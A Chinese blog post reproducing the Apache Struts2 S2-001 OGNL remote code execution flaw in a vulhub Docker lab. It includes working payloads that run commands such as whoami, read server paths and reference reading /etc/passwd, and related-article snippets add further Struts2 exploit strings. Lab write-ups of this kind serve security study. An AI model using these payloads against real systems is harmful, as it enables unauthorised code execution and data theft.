struts2(s2-001)远程代码执行漏洞docker&&vulhub复现

已于 2022-07-13 16:31:00 修改
阅读量1.7k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: docker struts 容器 安全 网络安全
于 2022-07-12 19:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43455259/article/details/125736839
版权

本文仅作为个人学习记录及学习交流,禁止用于非法活动
《中华人民共和国网络安全法》

原理

因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行

环境准备

1、Centos 7
2、docker(保证已开启)
3、vulhub靶场

复现

一、服务搭建

1、进入vulhub中s2-001所在目录

/usr/vulhub/struts2/s2-001(根据vulhub个人安装目录自行调整)

![在这里插入图片描述](https://img-blog.csdnimg.cn/104a3f9992d34ab6828ccd1a984a6b01.png

2、查看漏洞说明

cat README.zh-cn.md (README.md为英文版)

![在这里插入图片描述](https://img-blog.csdnimg.cn/19f6a260199e4d56b8c1b8b36ed858f5.png

3、docker容器启动

docker-compose up

![在这里插入图片描述](https://img-blog.csdnimg.cn/88a88af720f14b7ca3c052d917ab21ca.png

4、查看docker进程,确定服务端口

docker ps

在这里插入图片描述端口为8080

二、漏洞测试

1、访问http://192.168.92.138:8080/

ip:8080

![在这里插入图片描述](https://img-blog.csdnimg.cn/0effb3b01ad8439093cdae2655f3f4db.png

2、输入账号密码,brup抓包

在这里插入图片描述发送到repeter
password字段改为payload

%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D

发包后返回命令执行结果

![在这里插入图片描述](https://img-blog.csdnimg.cn/cfdee0a23925425fb59da6158a4f88cb.png

POC && EXP

获取tomcat执行路径:

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

获取Web路径:

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

执行任意命令(命令加参数:new java.lang.String[]{"cat","/etc/passwd"}):

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
_ChangAn
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnStack - ATT&CK红队评估实战(四) Writeup
carmi的博客
09-03 38
VulnStack - ATT&CK红队评估实战(四) Writeup VulnStack(四)环境搭建 1、项目地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 2、网络拓扑 机器名称 网卡VMnet4 网卡VMnet3 账号密码 web_ubuntu 192.168.157.132 192.168.183.133...
struts2远程代码执行漏洞简要回顾
networkangle的专栏
07-15 2685
apache官方安全公告页面: http://struts.apache.org/development/2.x/docs/security-bulletins.html 其中涉及代码执行漏洞有:S2-003,S2-005,S2-007,S2-008,S2-009,S2-012~S2-016,下面逐一简要说明。 一、S2-003 受影响版本:低于Struts 2.0.12
Struts2 系列漏洞 - S2-001
最新发布
YJ_12340的博客
06-04 415
Struts2 是较早出现实现 MVC 思想的 java 框架。struts2 在 jsp 文件中使用 ognl 表达式来取出值栈中的数据。struts 标签与 ognl 表达式的关系类似于 jstl 标签与 el 表达式的关系。[故在 jsp 文件中需引入 struts 标签库]
Apache Struts2远程代码执行漏洞(S2-001)复现
m0_58606546的博客
01-14 2434
0x01 漏洞概述 1、漏洞名称 漏洞名称:Struts Remote Code Exploit 漏洞编号:Struts2-001 漏洞类型:Remote Code Execution 2、漏洞原理 Struts2 是流行和成熟的基于 MVC 设计模式的 Web 应用程序框架。 Struts2 不只是 Struts1 下一个版本,它是一个完全重写的 Struts 架构。Struts2 的标签中使用的是OGNL表达式,OGNL 是 Object Graphic Navigation Language(
Struts2远程代码执行漏洞(CVE-2020-17530) 复现及排查
dayouzi的博客
08-15 1219
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。CVE-2020-17530是对CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。在特定的环境下,远程攻击者通过构造恶意的OGNL表达式,可造成任意代码执行
vulhubS2-008漏洞复现
qq_45300786的博客
07-08 417
poc http://192.168.100.23:8080/devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true
struts2远程代码执行漏洞合集
黑白的博客
12-21 4586
声明 好好学习,天天向上 S2-001 漏洞描述 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响范围 Struts 2.0.0 - Struts 2.0.8 复现过程 使用vulhub cd /app/vulhub-m
基于RedHat——docker&docker-compose&nvidia-docker2&nvidia驱动离线安装
01-18
1.包含docker安装的包及依赖包 2.包含docker-compose安装的包及依赖包 3.基于RedHat系统的nvidia驱动包 4.nvidia-docker2驱动安装包及依赖包 5.安装命令简介 下载之后,可以在无网的环境下离线安装。
基于Ubuntu——docker&docker-compose&nvidia-docker2&nvidia驱动离线安装
01-18
1.包含docker安装的包及依赖包 2.包含docker-compose安装的包及依赖包 3.基于Ubuntu系统的nvidia驱动包 4.nvidia-docker2驱动安装包及依赖包 5.安装命令简介 下载之后,可以在无网的环境下离线安装。
docker-build-push:Docker Build&Push GitHub操作
05-08
Docker构建和推送操作 构建一个Docker映像并将其推送到您选择的私有注册表中。 支持的Docker注册表 Docker集线器 Google Container Registry(GCR) AWS Elastic Container Registry(ECR) GitHub Docker注册表 ...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
centos7.6离线安装docker-ce-19.03、nvidia-docker2
08-03
离线环境下,在centos7.6系统上安装docker-ce-19.03,nvidia-docker2.4版本,其中docker-ce-19.03在docker-local.tar压缩文件里面,nvidia-docker2在nvidia-docker2.zip文件中。 具体安装流程如下: 1.安装docker ...
Struts2远程代码执行漏洞
weixin_46801402的博客
11-01 508
Struts2远程代码执行漏洞
渗透测试-Struts2远程代码执行漏洞
道阻且长,行则将至。
08-11 2190
漏洞描述 【漏洞概述】 Apache Struts 2是世界上最流行的Java Web服务器框架之一。Apache Struts2在使用REST插件的情况下,攻击者使用REST调用恶意表达式可以远程执行代码。 该漏洞编号为CVE-2016-4438,目前命名为S2-037。黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有...
struts2远程代码执行漏洞汇总整理
热门推荐
dl71181的博客
05-30 1万+
一、S2-001 1、漏洞原理 在默认配置下,如果用户所提交的表单出现验证错误,后端会对用户的输入进行解析处理,然后返回并显示处理结果。 举个例子,当你提交的登录表单为username=xishir&password=%{1+1}时,后端验证登录失败后会返回登录界面并显示你的输入,这时password字段中的OGNL表达式已经被解析处理过了,所以会显示%{1+1}的解析结果2...
dockervulhubstruts2漏洞复现详细过程(s2-001/007/008)
AmyBaby00的博客
11-14 2960
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 简介&准备: 1、centos7 已开启docker :systemctl restart docker.service 2、进入vulhubstruts2 : cd vulhub/struts2 3、启用测试环境:docker-compose up -d 4、PC...
vulhub靶场struts2漏洞复现
weixin_44300286的博客
03-06 2294
0x01、S2-001远程代码执行漏洞 原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响版本 Struts 2.0.0 - Struts 2.0.8 poc 执行任意命令 %{#a=(new java.lan
Vulhub靶场之struts2漏洞复现
weixin_66717977的博客
03-21 1324
struts2漏洞中属s2系列杀伤力最大,本文基于vulhub靶场,将介绍并复现strut2漏洞
systemctl start cri-docker && systemctl enable cri-docker
10-27
这是一个Linux命令,用于启动并设置开机自启Docker容器运行时(CRI-O)。CRI-O是一个轻量级的容器运行时,用于运行OCI(Open Container Initiative)兼容的容器。启动命令systemctl start cri-docker会启动CRI-O服务,而systemctl enable cri-docker则会将其设置为开机自启。这样,当系统启动时,CRI-O服务会自动启动,以便在需要时运行Docker容器

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值